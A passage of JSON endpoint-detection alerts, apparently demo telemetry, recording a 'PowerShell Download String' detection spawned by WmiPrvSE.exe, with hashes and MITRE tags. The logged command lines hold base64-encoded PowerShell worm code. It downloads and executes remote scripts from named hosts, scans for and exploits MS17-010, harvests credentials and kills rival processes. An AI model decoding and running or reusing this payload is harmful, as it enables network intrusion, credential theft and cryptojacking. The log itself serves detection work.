bQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
                  "parent_app": "WmiPrvSE.exe",
                  "parent_app_path": "C:\\Windows\\System32\\wbem",
                  "parent_pid": 2236,
                  "parent_puid": 132461352663910600,
                  "parent_user": "SYSTEM",
                  "parent_user_sid": "010100000000000512000000",
                  "pid": 10724,
                  "puid": 132465072105597400,
                  "ts": 1602033881727175700,
                  "user": "SYSTEM",
                  "user_sid": "010100000000000512000000"
                }
              }
            ],
            "limited": false,
            "matched": 1
          },
          "schema": "endpoint",
          "schema_epoch": 2,
          "sig_id": 20200719101800,
          "sig_rev": 1
        },
        "detection": "apde:20200719101800",
        "end_ts": 1620188084,
        "engine": "apde",
        "id": "cF3A8bacac",
        "name": "PowerShell Download String",
        "observables": {
          "file": [
            {
              "md5": "d683c112190f4b4c6d477d693ee88e35",
              "name": "WmiPrvSE.exe",
              "path": "C:\\Windows\\System32\\wbem",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "67858ead93feed62c0b1865369840e6e8086f53b",
              "sha256": "385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334",
              "size": 425984,
              "type_id": 1
            },
            {
              "md5": "a575a7610e5f003cc36df39e07c4ba7d",
              "name": "powershell.exe",
              "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
              "properties": {
                "copyright": "© Microsoft Corporation. All rights reserved.",
                "file_version": "10.0.14409.1005",
                "product": "Microsoft® Windows® Operating System",
                "product_version": "10.0.14409.1005"
              },
              "sha1": "88e7cdc0b75364418e11b2c53f772085f1b61d1e",
              "sha256": "006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218",
              "size": 443392,
              "type_id": 1
            }
          ]
        },
        "remediated": false,
        "severity": "medium",
        "silent": true,
        "start_ts": 1620188084,
        "tactics": [
          "TA0002",
          "TA0005"
        ],
        "techniques": [
          "T1059"
        ],
        "type": "activity",
        "normalized": {
          "observables": {
            "file": {
              "name": [
                "wmiprvse.exe",
                "powershell.exe"
              ],
              "path": [
                "c:\\windows\\system32\\wbem",
                "c:\\windows\\system32\\windowspowershell\\v1.0"
              ]
            }
          },
          "name": "powershell download string"
        },
        "demo": true
      },
      "tactics": [
        "TA0002",
        "TA0005"
      ],
      "techniques": [
        "T1059"
      ]
    },
    {
      "id": 6880683125978957000,
      "timestamp": 1620188084,
      "timestamp_nanoseconds": 791000000,
      "date": "2021-05-05T04:14:44+00:00",
      "event_type": "Threat Detection",
      "event_type_id": 553648222,
      "detection": "PowerShell Download String",
      "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
      "group_guids": [
        "3aef61ae-a41f-4a89-a47d-1ce96164eea8"
      ],
      "severity": "Medium",
      "computer": {
        "connector_guid": "2c846819-d267-4b76-9225-3709b97e3f78",
        "hostname": "Demo_BP_WMIPRVSE",
        "external_ip": "145.238.35.100",
        "active": true,
        "network_addresses": [
          {
            "ip": "166.65.137.252",
            "mac": "8a:26:b5:30:1f:04"
          }
        ],
        "links": {
          "computer": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78",
          "trajectory": "https://api.eu.amp.cisco.com/v0/computers/2c846819-d267-4b76-9225-3709b97e3f78/trajectory",
          "group": "https://api.eu.amp.cisco.com/v0/groups/b077d6bc-bbdf-42f7-8838-a06053fbd98a"
        }
      },
      "bp_data": {
        "audit": false,
        "details": {
          "actions": [

          ],
          "eng_epoch": 1,
          "eng_ver": "0.9.0.104",
          "matched_activity": {
            "events": [
              {
                "process:start": {
                  "app": "powershell.exe",
                  "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
                  "args": [
                    "powershell.exe",
                    "-NoP"
                  ],
                  "cmd_line": "powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2A